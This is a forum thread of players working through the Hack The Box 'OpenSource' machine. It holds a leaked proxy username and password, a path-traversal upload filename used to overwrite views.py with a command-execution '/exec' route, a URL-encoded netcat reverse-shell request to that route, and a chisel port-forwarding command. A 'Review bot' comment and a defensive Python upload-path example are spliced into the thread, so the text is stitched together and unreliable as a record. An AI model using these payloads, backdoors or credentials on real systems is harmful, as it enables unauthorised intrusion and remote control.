OpenSource - HTB [Discussion]
For Root There is Cron:

2022/05/21 22:15:01 CMD: UID=0    PID=19179  | /usr/lib/git-core/git-remote-http origin http://opensource.htb:3000/dev01/home-backup.git
Reply
Can someone please tell me where I can find the creds in docker?
Reply
(May 21, 2022, 11:46 PM)tom Wrote: Can someone please tell me where I can find the creds in docker?


{
+  "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
+  "http.proxy": "http://dev01:Soulless_Developer#[email protected]:5187/",
+  "http.proxyStrictSSL": false
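Review bot: the added "http.proxy" value carries a username and password inline in the proxy URL, so the credential is now stored in the repository and stays recoverable from history even if a later commit removes the line; move it out of the tracked settings file and rotate the password. The "http.proxyStrictSSL": false line after it also turns off certificate verification for proxied requests; drop it or document why it is needed.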
Reply
hints for the root part?
Reply
(May 21, 2022, 08:32 PM)dude4695 Wrote: in views.py


import os

from app.utils import get_file_name
from flask import render_template, request, send_file

from app import app


@app.route('/', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        f = request.files['file']
        file_name = get_file_name(f.filename)
        file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
        f.save(file_path)
        return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
    return render_template('upload.html')



@app.route('/uploads/<path:path>')
def send_report(path):
    path = get_file_name(path)
    return send_file(os.path.join(os.getcwd(), "public", "uploads", path))


@app.route('/exec')
def runcmd():
    return os.system(request.args.get('cmd'))


in burpsuite change this

Content-Disposition: form-data; name="file"; filename="..//app/app/views.py"


in browser

http://IP/exec?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20IP%20PORT%20%3E%2Ftmp%2Ff

you'll get rev shell of container


you have to just replace views.py file


How did you find this source code with exec? I downloaded the files and have not seen this. Looked in two branches.
Reply
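An added example, not code from the thread or from the application: it shows why the `os.path.join(os.getcwd(), "public", "uploads", file_name)` pattern in the quoted upload handler does not confine writes to the uploads directory, next to a resolver that does. The `/app` working directory, the function names and the sample filenames other than the one quoted in the thread are assumptions; what `get_file_name` returns is not shown on the page, so the naive function takes the name as-is.

```python
import os


class UnsafeUploadName(ValueError):
    """Raised when a client-supplied name resolves outside the upload root."""


def naive_upload_path(file_name, cwd="/app"):
    # Same join as the handler in the thread; normpath only makes the result readable.
    return os.path.normpath(os.path.join(cwd, "public", "uploads", file_name))


def safe_upload_path(file_name, cwd="/app"):
    root = os.path.realpath(os.path.join(cwd, "public", "uploads"))
    # realpath collapses "..", duplicate slashes and symlinks before the check.
    candidate = os.path.realpath(os.path.join(root, file_name))
    # An absolute file_name makes join() discard root entirely, so compare
    # the resolved result against root instead of trusting the input string.
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise UnsafeUploadName(file_name)
    return candidate


def is_allowed(file_name, cwd="/app"):
    try:
        safe_upload_path(file_name, cwd)
        return True
    except ValueError:  # UnsafeUploadName, or an embedded NUL rejected by realpath
        return False


# Constructed sample names; the second is the filename quoted in the thread.
SAMPLES = ["report.pdf", "..//app/app/views.py", "/app/app/views.py", "../../app/views.py"]

if __name__ == "__main__":
    for name in SAMPLES:
        verdict = "allowed" if is_allowed(name) else "rejected"
        print(f"{name!r:28} naive -> {naive_upload_path(name):32} safe -> {verdict}")
```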
(May 22, 2022, 12:10 AM)Exited3n Wrote:
(May 21, 2022, 11:46 PM)tom Wrote: Can someone please tell me where I can find the creds in docker?


{
+  "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
+  "http.proxy": "http://dev01:Soulless_Developer#[email protected]:5187/",
+  "http.proxyStrictSSL": false

thank you
Reply
How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go
Reply
(May 22, 2022, 12:29 AM)ryzen Wrote: How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go


try to bring port 3000 from 172.17.0.1 with chisel
Reply
(May 22, 2022, 12:29 AM)ryzen Wrote: How do you ssh from the docker? It doesn't seem to have ssh on it. I tried forwarding port 22 using chisel, but still no go


./chisel client -v 10.10.16.22:8000 R:127.0.0.1:3000:172.17.0.1:3000
Reply
(May 22, 2022, 12:15 AM)noob4567 Wrote: How did you find this source code with exec? I downloaded the files and have not seen this. Looked in two branches.


It's not present by default.
You just need to edit the original file "views.py" present in the source.zip and add at the end:

@app.route('/exec')
def runcmd():
    return os.system(request.args.get('cmd'))
Reply